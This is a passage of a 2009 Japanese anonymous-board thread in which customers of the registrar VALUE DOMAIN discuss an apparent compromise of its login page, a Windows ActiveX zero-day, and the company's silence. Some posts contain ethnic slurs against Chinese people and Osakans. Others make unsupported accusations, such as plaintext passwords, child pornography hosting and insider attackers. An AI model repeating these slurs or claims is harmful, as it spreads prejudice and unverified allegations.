おっと、こーゆーときに「ググレカス」ってんだっけ
140名無しさん@お腹いっぱい。:2009/07/07(火) 03:00:47 0
そんなわかりやすい逃げ打たれてもw
裏付けできないテキトーな事言うなって
141名無しさん@お腹いっぱい。:2009/07/07(火) 03:12:56 0
規約にこんなこと書いてあるからVDはなにもしなくてもOK
やるかやらないかはもはやVDの気分次第


VALUE DOMAIN サービス利用規約
 利用者は日本国内に在住で、且つ、日本語を理解できるものとします。

【責任の限界について】
 以下の事項に起因して発生する可能性のある損失について、
 当社及び上位レジストラは、利用者あるいは第三者に対して責任を負わないことに、
 利用者は同意するものとします。

●あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失
●あらゆる非常事態が発生したことによる損失
142名無しさん@お腹いっぱい。:2009/07/07(火) 03:14:21 0
ググレカスって
逃げ口上にも使えるんだなあ
               みつを
143名無しさん@お腹いっぱい。:2009/07/07(火) 03:16:57 0
なんつーか、毎度のことながら、鯖がクラックされるって酷すぎだよな
また保守管理を委託してるシナ人の仕業なんじゃね?
あいつら、何度注意したって聞かねーし
144名無しさん@お腹いっぱい。:2009/07/07(火) 03:29:44 0
次はどんなハード調教をしてくれるんだろうと更なる期待が高まる
145名無しさん@お腹いっぱい。:2009/07/07(火) 03:47:48 0
次から次に、ここは何かとネタが尽きんなぁ・・・
146名無しさん@お腹いっぱい。:2009/07/07(火) 04:04:57 0
今回の件すらアナウンスしないのなら引っ越しするかな
147名無しさん@お腹いっぱい。:2009/07/07(火) 04:13:48 0
俺は特定のドメイン以外は2月の障害の時点で全部移管したよ。
148名無しさん@お腹いっぱい。:2009/07/07(火) 04:31:14 0
どこに移管したんだよ
149名無しさん@お腹いっぱい。:2009/07/07(火) 04:35:58 0
>>148
毎度w
150名無しさん@お腹いっぱい。:2009/07/07(火) 06:10:39 0
>▼2009.07.02
>セキュリティ強化について

率先して強化しなければならないセキュリティーを間違えてるだろw
151名無しさん@お腹いっぱい。:2009/07/07(火) 06:16:46 0
>>31-32 の件ですが、msvidctl.dllの脆弱性です。
アドバイザリ出ました。
ttp://www.microsoft.com/japan/technet/security/advisory/972890.mspx
レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
ttp://support.microsoft.com/kb/972890/

他にpdfとswfも併用されていますが、こちらは既知の脆弱性なので
AdobeReaderやFlashPlayerが最新バージョンであれば問題ありません。
152名無しさん@お腹いっぱい。:2009/07/07(火) 07:48:48 0
現時点でもまだVDログインページは修正されてないの?
153名無しさん@お腹いっぱい。:2009/07/07(火) 08:24:17 P
>>151
乙加齢臭
154121:2009/07/07(火) 08:25:23 0
おはよう
朝起きたらサポートからの回答か3件も入っていてビビッた。いつものように放置だと思っていたのに。
コピペは控えるけど要約すると

・カスタマーサポート(受付部門)には「弊社担当部門(メンテ担当?)」からの報告が無い
・担当部門への申し送りは行う
・真偽確認&アナウンスは担当部門の対応となる

ってところかな。一応、事の重大さは認識しているようだ。

気になるのは「担当部門からの報告がない」ってところ。
つまり、昨日深夜にスクリプトが外れたのは、VDの操作ではなく、
仕掛けた本人による操作の可能性もあるということだ。

正式アナウンスがあるまで、ログインは控えた方が良いな。
155名無しさん@お腹いっぱい。:2009/07/07(火) 08:28:02 0
しかし、速報でも何でも、公式アナウンスは絶対しないんだw
ある意味潔いよねw デジロイズムw
156名無しさん@お腹いっぱい。:2009/07/07(火) 08:41:44 0
いつも事あれば全て「担当部門(外注)」だな・・・
157名無しさん@お腹いっぱい。:2009/07/07(火) 08:51:22 0
去年の広告鯖ウイルス混入の件の再来って感じだね
158名無しさん@お腹いっぱい。:2009/07/07(火) 09:18:14 P
誰か高木先生にチクってよ
159名無しさん@お腹いっぱい。:2009/07/07(火) 09:29:38 0
今wiki見たら前のウイルス事件の内容はいつの間にか記事削除されてるw
社員さんもそういう熱意を肝心なとこに向けてくれたらいいのにw
160名無しさん@お腹いっぱい。:2009/07/07(火) 09:36:53 0
>>154
認識はいつも早いんだけど、その後放置でアナウンスせず黙殺だからいつもと変わらないのでは?
クレームにそういった内容の定型文を即返すって対応は従来通りだし

しかし、これくらいの修正すら即できない人間しか社内にいないのか?
外部丸投げがデフォでもちょっとひどすぎだろ
161名無しさん@お腹いっぱい。:2009/07/07(火) 09:49:34 0
>>154
今回もやっぱり文末は
「騒がず黙って○週間待ってろカス共 ○週間の間は再度文句垂れてきてもシカトだからなコラ(意訳)」
な訳?
162名無しさん@お腹いっぱい。:2009/07/07(火) 09:51:14 0
:::::::::::::::(>'A`)> ウワァァァァ :::::::
:::::::::::::::( へへ :::::::::::::::::::::::::::::::::
163名無しさん@お腹いっぱい。:2009/07/07(火) 09:58:58 0
今更ながら・・・







これはひどい
164121:2009/07/07(火) 10:07:51 0
>>160
そーかもしれないけど、客としては待つしかないしなあ。
でも、俺も過去何度かサポートとやりとりしてるけど、深夜に送った奴に
深夜のウチに打ち返してきたのは初めてだったよ。

>>161
いや、見慣れたその定型文は今回は無いよ。

今回の件は顧客の財産(金やドメイン)に直接影響する問題なので
迅速かつ的確な対応をお願いしたいですな、VD様。
165名無しさん@お腹いっぱい。:2009/07/07(火) 10:11:20 0
たしかにドメイン絡みで各種情報ぶっこ抜かれて改竄でも
やられたら洒落にならん。
ここで管理してるあと数個のドメインも、あと少しで移管可
になるんで全部移管したいが怖くてログインできん。
166名無しさん@お腹いっぱい。:2009/07/07(火) 10:15:40 0
今はログインしても大丈夫? まだ駄目?
167名無しさん@お腹いっぱい。:2009/07/07(火) 10:18:30 0
今回、ログイン部分が改ざんされ個人情報が脅かされたわけだろ?

5000件以上の個人情報をデータベース等として所持し事業に用いている事業者は
必然的に個人情報取扱事業者に該当するんだよ。
該当する場合は個人情報保護法に乗っ取った運営をしなければならない。
今回、こういう被害受けたからには、デジロック側が個人情報保護法に基づき総務省に報告義務がある。
まさか登録者5000件未満というわけでも無さそうだし。

それ以外にも、以前にも似たようなことがあったということから、
電気通信事業者としても注意義務違反にあたるかもしれない。
ここらへんは詳細わからないことには判断できないが。

とにかく、このまま放置で済む問題ではないのは確実だ。
168名無しさん@お腹いっぱい。:2009/07/07(火) 10:22:10 0
何が入ってるかわからんからログインするな。
169名無しさん@お腹いっぱい。:2009/07/07(火) 10:32:17 0
>>154
やっぱり、「担当部門」=「前回広告鯖をクラックしたシナ人」=「今回ログインフォームを改ざんした犯人」なんじゃね?
だから、デジロの中の人が真偽確認してもレスポンスが悪い、と

もう、大阪人は信用ならんなぁ
170名無しさん@お腹いっぱい。:2009/07/07(火) 10:34:23 0
大阪は大阪民国法が適用されるから日本国の法律には準拠しないよ
171名無しさん@お腹いっぱい。:2009/07/07(火) 10:37:02 0
なんかサポ板の挙動がおかしいのもこの改竄の件関係あるのかな?
それとも6月頭から完全放置のネームサーバ障害のせいかな?
172名無しさん@お腹いっぱい。:2009/07/07(火) 11:25:47 0
これだけ被害だしといて、告知すらないとかありえないわ。
ウイルス配布元として訴えられてもしょうがないレベル
173名無しさん@お腹いっぱい。:2009/07/07(火) 11:40:54 0
別にデジロック擁護する気はないけど、被害って言ってもまだ別に表立った実害って報告されてないでしょ?
徹底的に祭り上げられるか否かは今後の動向次第じゃないかな現時点では

速報なり何なりで即時何かしらの公式アナウンス出すべきだとは思うけどね
後に大事になった時に、認知しながらも被害拡大させた責任追及されて一番困るのはデジロックだろうから
174名無しさん@お腹いっぱい。:2009/07/07(火) 11:49:39 0
て言うかまだ今の時点でログインページは改ざんされてるの?
どっちにしてもデジロが何もユーザーに対して説明しないと怖くてコンパネ入れないけど・・・
175名無しさん@お腹いっぱい。:2009/07/07(火) 11:52:48 0
ここはいつも通り、自然治癒力に頼るしか方法はありません
176名無しさん@お腹いっぱい。:2009/07/07(火) 12:07:15 0
どうせまた内部犯行だろ
177名無しさん@お腹いっぱい。:2009/07/07(火) 12:12:50 0
技術者が逃げて外注に頼ってもお金が無くて素性の確かでない安いところに
頼んで乗っ取られたとかじゃない?
178名無しさん@お腹いっぱい。:2009/07/07(火) 12:25:29 0
結局どうだったの?改竄はあったの?
179名無しさん@お腹いっぱい。:2009/07/07(火) 12:30:18 0
GENOみたいな商売ならだんまりでも
「まあGENOだしな」で済むだろうけど
ここは腐っても鯖屋だぜ?
なるべく早急にまともな対応をしないと
冗談抜きに取り返しのつかないことになるかと
180名無しさん@お腹いっぱい。:2009/07/07(火) 12:32:09 0
改ざんがあったかどうかなんて、ログくらいよめよ
90レス番台あたりとかに、全部のってるじゃん
181名無しさん@お腹いっぱい。:2009/07/07(火) 12:41:01 0
デジロなんて、コアサーバーの殆どが児童ポルノサイト運営させて沢山あるくらいだしな
全く何とも思ってないよ
182名無しさん@お腹いっぱい。:2009/07/07(火) 12:43:35 0
もしなんらかの損害が発生しても、
「あらゆる非常事態が発生したことによる損失」に対する責任は負いません
そういう規約ですから
183名無しさん@お腹いっぱい。:2009/07/07(火) 12:45:09 0
login.php を元に戻したのが誰かが分からない限り、ログインするのは危険。

デジロが対応したのなら、そのことを告知すべき、
公式告知がない=仕掛けた奴が操作している可能性あり。すると、ログインは危険
184名無しさん@お腹いっぱい。:2009/07/07(火) 12:48:42 0
待て…
よく考えるんだ…

これはトラブル続きで移管転出続出のデジロが仕組んだ逆転捨て身の移管防止策…!?
185名無しさん@お腹いっぱい。:2009/07/07(火) 12:51:55 0
捨て身過ぎるだろw
186名無しさん@お腹いっぱい。:2009/07/07(火) 12:57:28 0
ああそうか、鯖に安全宣言がなされてなければ、
じつはPOSTの受け取りを細工されてて、生パスが抜かれるかもしれんわけね
187名無しさん@お腹いっぱい。:2009/07/07(火) 13:07:53 0
http://www.itmedia.co.jp/enterprise/articles/0907/07/news015.html

Windowsにゼロデイの脆弱性、サイト改ざん攻撃が多発

MicrosoftのVideo ActiveX Controlにゼロデイの脆弱性が発覚した。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。

 MicrosoftのWindowsに影響する新たな脆弱性が見つかり、これを悪用したゼロデイ攻撃が発生している。Microsoftは7月6日、アドバイザリーを公開して注意を呼び掛けた。

 Microsoftによると、脆弱性はVideo ActiveX Controlに存在し、Windows XPとWindows Server 2003が影響を受ける。Internet Explorer(IE)を使って悪用された場合、ユーザーが何もしなくてもリモートからコードを実行される恐れがある。

 SANS Internet Storm Centerによれば、この脆弱性を悪用するコードが中国の多数のWebサイトで公開され、それを使った攻撃が多発。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。

 Microsoftは現在、脆弱性を解決するためのセキュリティアップデートを開発中。当面の回避策として、脆弱性のあるActiveX Control(msvidctl.dll)にキルビットを設定する方法を紹介している。自動的にこの回避策を適用できるツールも用意した。

 また、米McAfee、Symantecなど主要セキュリティ企業はウイルス対策ソフトの定義ファイルを更新し、今回の脆弱性の悪用コードを検出できるようにしたと発表している。
188名無しさん@お腹いっぱい。:2009/07/07(火) 13:09:17 0
さすがに基幹までのっとられるようになったら終わりだな
189名無しさん@お腹いっぱい。:2009/07/07(火) 13:17:42 0
ここの外注も中華系だよね?
ったく・・・ 前のウイルスの件で懲りなかったのかよ・・・
190名無しさん@お腹いっぱい。:2009/07/07(火) 13:18:44 0
よく分からんけど
感染対象はIEで、vistaでは対象外って事でおk?
191名無しさん@お腹いっぱい。:2009/07/07(火) 13:22:48 0
ここの、
その後の正規サイト改ざん〔後篇〕(3):新たな攻撃手法〜「新Nine Ball」「8080」
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1936

ここ読んどけ。
●「8080」:大量ドメインを使用する8080攻撃
192名無しさん@お腹いっぱい。:2009/07/07(火) 13:38:55 0
2009.07.02
セキュリティ強化について

wwwwwwwwwwwwwwwwwwwwwwwwwwwww
193名無しさん@お腹いっぱい。:2009/07/07(火) 13:49:06 0
配下サイトが全滅、恐怖の共有サーバー丸ごと改ざん〜「5+1」件の事例報告
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1938


いやー、こわいねー
194名無しさん@お腹いっぱい。:2009/07/07(火) 14:00:34 0
まさに今回のはデジロ狙い撃ちでしょ?

この業界で商売してて狙われてあっさり撃たれるデジロ…orz
195名無しさん@お腹いっぱい。:2009/07/07(火) 14:11:52 0
非常にお伝えしにくいのですが、実はVALUE-DOMAINのログインパスワードは、
ハッシュ化されていない、プレインテキスト記録なので、login.phpの書き変えが可能なら、
DBパスも取られているはずなので、もう既に全ユーザーのパスワードが割れて
いることになるのです。
196名無しさん@お腹いっぱい。:2009/07/07(火) 14:22:10 0
だとしたらlogin.phpを改竄する意味は?
197名無しさん@お腹いっぱい。:2009/07/07(火) 14:22:55 0
デジロ、login.php の書き換え事件についての公式声明を早く出せ。
これでも、だんまり戦術が通用すると思っているのか?
198名無しさん@お腹いっぱい。:2009/07/07(火) 14:28:38 0
いつも通り放置してるだけですけどね
199名無しさん@お腹いっぱい。:2009/07/07(火) 14:31:27 0
鉄壁なマイペースw
200名無しさん@お腹いっぱい。:2009/07/07(火) 14:35:21 0
久々に来てみたら大変な事になっているじゃないか
今度のは今まででも最強だな・・・
オワタ
201名無しさん@お腹いっぱい。:2009/07/07(火) 14:44:05 0
>>194
無差別攻撃で落ちたもののひとつなだけじゃないかと
まだ発覚してないところがありそう
202名無しさん@お腹いっぱい。:2009/07/07(火) 14:45:11 0
今までも相当酷い障害はあったけど確かにこれは過去最強最凶クラスだ
これで実際の被害報告なんかが出だしたらニュースサイト巻き込んで七夕祭だなw
203名無しさん@お腹いっぱい。:2009/07/07(火) 14:49:41 0
去年くらいから特に目だって続くこのデジロックの崩壊具合ったら何なの
204名無しさん@お腹いっぱい。:2009/07/07(火) 14:50:17 0
>>194
動作からすると、感染経路はGENOとほぼ同じじゃないのかな。
そこから個別にlogin.phpに仕込むとか。。。ね。
ドメイン見れば美味しいエサってのはすぐ分かりそうだし、
domainでフィルタ読みされればイチコロ?
205名無しさん@お腹いっぱい。:2009/07/07(火) 15:31:20 0
とりあえずセキュリティホールmemoに取り上げられたから、かなり知れ渡ってるさ。
206名無しさん@お腹いっぱい。:2009/07/07(火) 15:33:21 0
何日の時点でログインしてたらアウト?
207名無しさん@お腹いっぱい。:2009/07/07(火) 15:39:10 0
ところでまだ捏造を唱える社員の火消しは来ないの?
208名無しさん@お腹いっぱい。:2009/07/07(火) 15:44:49 0
ここ2〜3日はそれどころじゃないみたいだぞw
209名無しさん@お腹いっぱい。:2009/07/07(火) 15:51:10 0
とりあえず安心して管理画面に入れない様じゃ何もできないんだが…
210名無しさん@お腹いっぱい。:2009/07/07(火) 15:51:46 0
211名無しさん@お腹いっぱい。:2009/07/07(火) 16:00:32 O
とりあえず、管理ドメインを、enomのアカウントにプッシュしておいた。

さらに、enomアカウントのパスワード、メールアドレスを変更。
ロックもかけといた。

少し安心。。。
212名無しさん@お腹いっぱい。:2009/07/07(火) 16:22:31 0
ソースは2ちゃんって困るし詳しくない人もVD使ってるから公式にアナウンスだしてくれないだろうか
213名無しさん@お腹いっぱい。:2009/07/07(火) 16:33:19 0
こっそり消すようなところに期待しても無駄かと。
214名無しさん@お腹いっぱい。:2009/07/07(火) 16:49:02 0
SymantecによるとIE8だと大丈夫そうな…ほんとやろか。
http://itpro.nikkeibp.co.jp/article/NEWS/20090707/333313/
215名無しさん@お腹いっぱい。:2009/07/07(火) 16:56:02 0
FirefoxでVDの管理画面に入るのは、IEでないから大丈夫なの?
それとも同じく危険なのかな?
216名無しさん@お腹いっぱい。:2009/07/07(火) 16:59:41 0
php改ざんの可能性が否定できない今、ブラウザは関係ない
217名無しさん@お腹いっぱい。:2009/07/07(火) 17:02:56 0
>>216
本質を分かっていない奴はけーん
218名無しさん@お腹いっぱい。:2009/07/07(火) 17:07:16 0
そーすが2ちゃんだけだと誰にもおしえれんやろー!
219名無しさん@お腹いっぱい。:2009/07/07(火) 17:17:02 0
バカしかいないようだ
220名無しさん@お腹いっぱい。:2009/07/07(火) 17:25:27 0
要するにもう安全ってこと?
221名無しさん@お腹いっぱい。:2009/07/07(火) 17:26:49 0
IE6/7以外のブラウザなら問題ないんだろ
Firefoxなら大丈夫だろ
222名無しさん@お腹いっぱい。:2009/07/07(火) 17:30:29 O
マカーで良かったナリ。
223名無しさん@お腹いっぱい。:2009/07/07(火) 17:32:18 0
phpがなんだとかいってるのは関係ないんだ
で、phpってなに?
224名無しさん@お腹いっぱい。:2009/07/07(火) 17:36:14 0
本じゃない?
225名無しさん@お腹いっぱい。:2009/07/07(火) 17:36:29 0
出版社
226名無しさん@お腹いっぱい。:2009/07/07(火) 17:38:34 0
Vistaなら大丈夫なのか、よかった
ようするにウイルス埋め込まれたってこと?
感染しないなら関係ないや
227名無しさん@お腹いっぱい。:2009/07/07(火) 17:39:54 0
ブラウザはXP、2003以前のIEだと攻撃を食らう
だから、それ以外でログインしてるなら、埋め込みスクリプトからは身を守れる

しかし、ログインフォームが改竄され、デジロ広報が把握してない誰かの手によって修復されたのが、現在残る懸念材料
こう易々と改竄されているとなると、一見正常なログインフォームでも内部をいじられている可能性がある
だから、正式アナウンスが出てないうちは安易にログインしないほうがいいって話だ
228名無しさん@お腹いっぱい。:2009/07/07(火) 17:44:03 0
よくわかんないけど、IE6/7はウイルスに感染するし、
かといって、ほかのブラウザでアクセスしても、こっちのブラウザに関係なくvalue-domain.comのサーバのほうで
何か情報送信とかしてるかもしれない、そんな二重の構えで待ち伏せされてる状態ってこと?
229名無しさん@お腹いっぱい。:2009/07/07(火) 17:46:07 0
co.ukとorg.ukのドメイン持ってるけど
移管できるとこがのきなみ高いっていうね…
こりゃ参った
230名無しさん@お腹いっぱい。:2009/07/07(火) 17:49:38 0
情報源が2chなんて信用できんな
捏造かもしれん
231名無しさん@お腹いっぱい。:2009/07/07(火) 17:50:26 0
テンプレの3、4って、どうなの?
232名無しさん@お腹いっぱい。:2009/07/07(火) 17:51:49 0
login.php を変更したのが、誰なのか分からない内は、ログインすること自体が危険
デジロがlogin.phpの改ざんを発見して対応修正したのなら、まだいいが、
もし修正したのが「デジロ」なら、公式にアナウンスが来て当然
公式アナウンスが無い=不安要素一杯 ということ。


233名無しさん@お腹いっぱい。:2009/07/07(火) 17:53:40 0
これは、他社の捏造ですよ。気にすることない。安全安全。

234名無しさん@お腹いっぱい。:2009/07/07(火) 17:54:52 0
firefoでよかった!
235名無しさん@お腹いっぱい。:2009/07/07(火) 17:57:26 0
もうちょっと上手く釣ってくれよ
あまりに白々しいとつまらんよ
236名無しさん@お腹いっぱい。:2009/07/07(火) 18:02:24 0
このスレに名うての釣り師なんていないと思う
237名無しさん@お腹いっぱい。:2009/07/07(火) 18:02:31 0
2ちゃんねるの情報は信用ならん
どっかのニュースサイトに取り上げられたら信用する
238名無しさん@お腹いっぱい。:2009/07/07(火) 18:04:04 0
3,4は今見たらエラーページになってた
昼、見たときは見れたんだけど
焦ったけど、一応>>85-86のコードはないみたい
じゃあ>>180
239名無しさん@お腹いっぱい。:2009/07/07(火) 18:05:42 0
なんだただの捏造か
240名無しさん@お腹いっぱい。:2009/07/07(火) 18:11:58 0
>>92の魚拓の中にドメイン移管方法ってページがある
>>ttps://www.value-domain.com/howto/?action=transfer
これで、どうでしょう?
241名無しさん@お腹いっぱい。:2009/07/07(火) 18:14:55 0
魚拓は開かないほうがいい
ウイルスいるから
242名無しさん@お腹いっぱい。:2009/07/07(火) 18:15:15 0
定期デジロマンセー厨は、ガチ社員とアンチ煽り基地外がいるよね
今湧いてるのは後者の方だね
243名無しさん@お腹いっぱい。:2009/07/07(火) 18:18:44 0
なにもなかった、捏造捏造、気にすることはない、デジロのセキュリティは鉄壁
244名無しさん@お腹いっぱい。:2009/07/07(火) 18:26:04 0
まあこのまま大した実害報告もなく終息すれば例の如く公式アナウンス無く終息コースだね。

実害出なきゃ騒ぐ事でもないし。
ただ今回の件は事が事だけに、今後の成り行きはどうあれ何らかのアナウンスは必要だろうな。
245名無しさん@お腹いっぱい。:2009/07/07(火) 18:27:26 0
今のところ特にVDユーザーでサイト改竄されたとかの被害報告ないよね?
246名無しさん@お腹いっぱい。:2009/07/07(火) 18:29:15 0
被害報告ないし大丈夫でしょ
ログインページが改ざんされた程度だし
247名無しさん@お腹いっぱい。:2009/07/07(火) 18:30:33 0
実害がないなら、アナウンスも不要
このスレ、早く埋めましょう
248名無しさん@お腹いっぱい。:2009/07/07(火) 18:33:23 0
揉み消し工作してんじゃねぇよ
249名無しさん@お腹いっぱい。:2009/07/07(火) 18:33:26 P
少なくとも昨夜から未明あたりに居たスレ住人は、検証してくれたり参考URL貼ってくれたり不明な点を解説してくれたり、
(デジロが法に触れるとか言いつつ根拠を問うとググレカスの一言で逃げた奴も居たけどw)
概してまともな書き込みが多かった気がするのだが、一晩経つと、こうも違うんだなぁという妙な感慨。
まぁ、予想通りだけどw
250名無しさん@お腹いっぱい。:2009/07/07(火) 18:47:41 0
実害が今のところ報告されてないから… だけどね。あくまで。

どうあれデジロからの公式アナウンスが無いとおちおち管理画面にログインできないって状況は変わらないから、現時点で問題にすべきはその辺だろう。
251名無しさん@お腹いっぱい。:2009/07/07(火) 18:50:54 0
まあ、少なくともlogin.phpが改竄されてたのは事実なんだし
それなら>>167の言うとおり登録ユーザーが5000以上なら
報告しなければ違法になる。
252名無しさん@お腹いっぱい。:2009/07/07(火) 18:52:37 O
今回は、閲覧者のPCに対するウィルスの仕込みと、ログイン時のパス抜きの二段構え。

パス抜きがいつぐらいに仕組まれたかが問題だな。
253名無しさん@お腹いっぱい。:2009/07/07(火) 19:01:28 0
実害がないとか言ってるけど、おまえらパス抜きクラッカーが即行動起こすと思ってるのか?w
最近はばれない様に暫くトラッキングして他の情報もぶっこ抜いてるんだぜ
被害が公になるのは数ヵ月後だ、潜伏期間が長いのさ
254名無しさん@お腹いっぱい。:2009/07/07(火) 19:06:54 0
だからこそ現時点での中間報告でも デジロからの公式アナウンスが必要なんだけどな

認知した事すらアナウンスしないんだから ちょっと酷すぎるよいくら何でも
255名無しさん@お腹いっぱい。:2009/07/07(火) 19:10:14 0
>>252
GENOもそうだった
256名無しさん@お腹いっぱい。:2009/07/07(火) 19:10:16 0
>>211はeNomからアカウント変更したみたいじゃね
テンプレの3、4って、どうなのよ?
257名無しさん@お腹いっぱい。:2009/07/07(火) 19:10:35 0
またオナニストか
258名無しさん@お腹いっぱい。:2009/07/07(火) 19:22:19 O
テンプレの3、4のやり方ではドメインプッシュはできない。
259名無しさん@お腹いっぱい。:2009/07/07(火) 19:29:57 0
原爆と同じ流れなのに釣られる人ってなんなの!
260名無しさん@お腹いっぱい。:2009/07/07(火) 19:30:52 0
本当ならフォーラムで大騒ぎだろ
261名無しさん@お腹いっぱい。:2009/07/07(火) 19:35:11 0
実は全部がせなんじゃね
魚拓とかウイルス報告も捏造とか
262名無しさん@お腹いっぱい。:2009/07/07(火) 19:36:29 0
>>240は?
魚拓からだとコードがあるけど
直接とべばソースにはコードなかった
>>151,187にあるように XPとWindows Server 2003
IEが攻撃対象ということだから
誰かドメイン持ってる人でVista、IE以外の
ブラウザの人やってみてくれないかな
263名無しさん@お腹いっぱい。:2009/07/07(火) 19:38:13 0
おまえそのレス連射パターン定番だよな
いちいち構ってあげたから、次からは少し目新しいのにパターン変えろよ
264名無しさん@お腹いっぱい。:2009/07/07(火) 19:38:44 0
馬鹿はとりあえず過去レスに目を通せよこの馬鹿
265名無しさん@お腹いっぱい。:2009/07/07(火) 19:45:05 0
アクアナがおかしいんだけど
266名無しさん@お腹いっぱい。:2009/07/07(火) 19:50:23 0
アグネス(チャン)のがおかしいです
267名無しさん@お腹いっぱい。:2009/07/07(火) 19:57:47 0
エラーページだけど、すでに修正済み?
キャッシュのほう見ればいいの?
268名無しさん@お腹いっぱい。:2009/07/07(火) 20:07:09 0
問題無し、既にセキュリティ修正済、デジロ最強
捏造にだまされるな。
269名無しさん@お腹いっぱい。:2009/07/07(火) 20:07:43 0
>>214
だめだと思う。「IEの」脆弱性じゃないし、一番詳しいはずの製造元の
MicrosoftセキュリティアドバイザリでもOS(XP・2003がやられる)にしか触れてない。
270名無しさん@お腹いっぱい。:2009/07/07(火) 20:09:10 0
今度はsageで社員乙といいたいんですね。わかります。
271名無しさん@お腹いっぱい。:2009/07/07(火) 20:17:19 0
もう、さくらにするお(´;ω;`)
272名無しさん@お腹いっぱい。:2009/07/07(火) 20:22:02 0
なぜわざわざ高価なさくら? 普通はムームーとかFC2じゃない?
273名無しさん@お腹いっぱい。:2009/07/07(火) 20:27:09 0
上場企業だから?>さくら
274名無しさん@お腹いっぱい。:2009/07/07(火) 20:30:46 0
一気に収束しててわろたwオナニスト乙w
275名無しさん@お腹いっぱい。:2009/07/07(火) 20:31:49 0
冗談だお。VD最高だお( ^ω^ )
276名無しさん@お腹いっぱい。:2009/07/07(火) 20:35:47 0
デジロ最強(^^)/
277名無しさん@お腹いっぱい。:2009/07/07(火) 20:36:18 0
>>271
さくらも去年別な手法(ARPスプーフ。サーバのコンテンツ改竄ではなく
経路上での改竄。FTPで見ても正常なのでわかりにくい)でやられてるよね。
ttp://www.sakura.ad.jp/news/archives/20080602-001.news
ttp://www.sakura.ad.jp/news/archives/20080605-002.news
278名無しさん@お腹いっぱい。:2009/07/07(火) 20:48:40 0
今日の昼頃と夕方にログインしちまったけど大丈夫かな。
279名無しさん@お腹いっぱい。:2009/07/07(火) 21:05:46 0
結局いつものうやむやか。orz
まともにしたら金かかるのは分かるがここまでコスト掛けないのも徹底してるな。
入金処理/コピペ対応人員だけで今回も乗り切ろうと?
280名無しさん@お腹いっぱい。:2009/07/07(火) 21:07:39 0
2chデジロ関連スレ工作&会話誘導要員のコスト計上を忘れてますよ
281名無しさん@お腹いっぱい。:2009/07/07(火) 21:13:17 0
フォーラムに書き込んでこいよ
282名無しさん@お腹いっぱい。:2009/07/07(火) 21:18:51 0
フォーラムからログインして意味あるの?
ソースにコードはなかったけど
283名無しさん@お腹いっぱい。:2009/07/07(火) 21:22:10 0
誰もフォーラムに報告をしていない
つまりはそんなことはなかった
2ちゃんねるだけの現象
284名無しさん@お腹いっぱい。:2009/07/07(火) 21:25:28 0
あんなクローズな空間でクローズなやり取りしてどうすんだよw
つか今サポ板も何か辺だぞ
285名無しさん@お腹いっぱい。:2009/07/07(火) 21:27:38 0
>>283

見えない敵と常に戦い続けないといけない性分って大変だね・・・
何がしたいの? 話聞いてあげるよ。
286名無しさん@お腹いっぱい。:2009/07/07(火) 21:38:39 0
287名無しさん@お腹いっぱい。:2009/07/07(火) 21:53:44 0
やっばついこの間にムームーに移管しておいて正解だったな。
まあ俺は大丈夫だけど最悪ドメイン乗っ取られたり、
勝手にドメインを売買されたりするかもな。
288名無しさん@お腹いっぱい。:2009/07/07(火) 22:04:24 0
>>284
何か変って?書き込めないとか?
289名無しさん@お腹いっぱい。:2009/07/07(火) 22:04:34 0
290名無しさん@お腹いっぱい。:2009/07/07(火) 22:04:44 0
騒ぎになってるから見に来たんだが
ネームサーバがボロボロになってるってマジ??
ドメイン管理提供しててありえないだろ
どうなってんだよこの会社は
291名無しさん@お腹いっぱい。:2009/07/07(火) 22:12:58 0
もうログインしても大丈夫なのか?
そもそもソースを改鼠されるってどんな状況なんだよ
292名無しさん@お腹いっぱい。:2009/07/07(火) 22:14:53 0
ネームサーバがボロボロって、もう丸一ヶ月経つぞ。
login.phpの改ざんの件が目下の最重要問題。

ログインしても問題ないかどうかは神のみぞ知る。
293名無しさん@お腹いっぱい。:2009/07/07(火) 22:18:18 0
なんか出張行ってる間にずいぶんスレが伸びてると思ったらえらいことになってるんだな。
まあ、俺は常時javascriptはoffにしてるから今回の問題は関係ないけど。

あ、支払いの時だけはjavascript許可しないと動作しなかったのでonにしたけど、かなり前の話しだし。
294名無しさん@お腹いっぱい。:2009/07/07(火) 22:28:36 0
クラッカーがPHPを自由に改ざんできたとすると、
パスや個人情報を引き抜き放題だった可能性があるな。
そうだった場合どうなることやら。
295名無しさん@お腹いっぱい。:2009/07/07(火) 22:32:51 0
話をすりかえるのに必死なのがいるなw
296名無しさん@お腹いっぱい。:2009/07/07(火) 22:35:26 0
>>293
クライアントPCは無事かもしれないけど無関係とはいえないよ
297名無しさん@お腹いっぱい。:2009/07/07(火) 22:40:27 0
つかPHP改竄できたのなら
個人情報ぶっこ抜きとか簡単にできるじゃろ
ろぎんしてないから関係ないよね(キリッ
って何アホなこと言ってんだよ
298名無しさん@お腹いっぱい。:2009/07/07(火) 22:43:52 0
なんかドメイン乗っ取られたっぽい。サイトが変な広告サイトになってる。
whoisしても全く知らん所になってるし。
あとなんかログインできなかったからパスワード再発行したけど梨の礫。

もうだめぽ。
299名無しさん@お腹いっぱい。:2009/07/07(火) 22:47:19 0
>>298
デジロユーザーざまぁwwwwwwwww
300名無しさん@お腹いっぱい。:2009/07/07(火) 22:47:49 0
>>298
いよいよ実害報告ですか
もうちっと詳しく教えていただけませんか?
301名無しさん@お腹いっぱい。:2009/07/07(火) 22:51:06 0
>>289>>104あたりでダメなのか
>>293
よく分からん。>>151ならAdobeReader、FlashPlayer最新バージョン、
javaスクoffならログインしてもいいのか
なんか別のとこで、それではダメだったケースがあったが
念のためブラウザIE以外にしといたほうのがいいのか
それでは、まるっきりGENOといっしょだが
自分では確認できんので、どうしようもない
302名無しさん@お腹いっぱい。:2009/07/07(火) 22:52:05 0
>>298
釣りじゃないならもっと詳しい情報を
303名無しさん@お腹いっぱい。:2009/07/07(火) 22:55:03 0
0-day攻撃だったのは分かるんだが
どうやってlogin.phpに仕込んだのか謎のままだな
304名無しさん@お腹いっぱい。:2009/07/07(火) 22:57:11 0
>>300
さっきサイトを確認しようとしたらサイトが変な広告サイトななってて、
whoisで確認したらIPから所有者情報まで全部書き変わってた。

あとログインしようとしてもできなかったんでパスワード再発行したんだけど、
そのメールも全く届かない。

サポには連絡したけどどうしようも無い状態。
